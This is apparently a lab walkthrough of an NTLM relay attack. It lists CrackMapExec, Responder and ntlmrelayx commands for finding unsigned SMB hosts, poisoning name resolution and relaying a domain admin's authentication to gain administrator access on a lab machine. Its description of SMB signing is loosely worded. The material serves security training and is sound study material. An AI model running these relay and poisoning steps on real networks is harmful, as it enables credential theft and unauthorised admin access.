NTLM relay
Unsigned SMB
Let’s start hunting unsigned smb in the lab and generate a list of IP targets.
https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
SMB signing is a security mechanism in the SMB protocol. When SMB signing is enabled, each SMB message is sent with a signature in the SMB header field. The signature consists of the contents of the SMB message, encrypted with the AES algorithm. This allows the recipient of the SMB message to verify that the content of the message has been changed. It also verifies the identity of the sender. If the content of the message doesn’t match the SMB header, the recipient knows that the message has been tampered with. The recipient then does nothing with this SMB message. This makes it impossible to successfully perform an NTLM relay attack.
cme smb 192.168.56.10-23 --gen-relay-list relay.txt
Now we got a list of signing:False
smb computers, we can start to try to relay ntlm authentication to them.
responder + ntlmrelayx to smb
Before starting responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder smb and http server as we don’t want to get the hashes directly but we want to relay them to ntlmrelayx.
sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
Next, we start ntlmrelayx
ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
-tf : list of targets to relay the authentication
-of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
-smb2support : support for smb2
-socks : will start a socks proxy to use relayed authentication
The program send back this error :
let’s fix it :
Type help for list of commands
self._target(*self._args, **self._kwargs)
File "/usr/local/lib/python3.10/dist-packages/impacket/examples/ntlmrelayx/servers/socksserver.py", line 247, in webService
from flask import Flask, jsonify
File "/usr/local/lib/python3.10/dist-packages/flask/__init__.py", line 19, in <module>
from jinja2 import Markup, escape
ImportError: cannot import name 'Markup' from 'jinja2' (/usr/local/lib/python3.10/dist-packages/jinja2/__init__.py)
let’s fix it :
pip3 install Flask Jinja2 --upgrade
Relaunch ntlmrelayx, fine it work :)
ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
Start responder to redirect queries to the relay server
responder -I vboxnet0
The poisoned connections are relayed to Yonkers (192.168.56.22) and maryland.local (192.168.56.23) and a socks proxy is setup to use the connection.
As fernando.alonzo is a domain administrator of north.newyork.local he got administrator privileges on Yonkers.
Now we can use this relay to get an access to the computer as an administrator
Last updated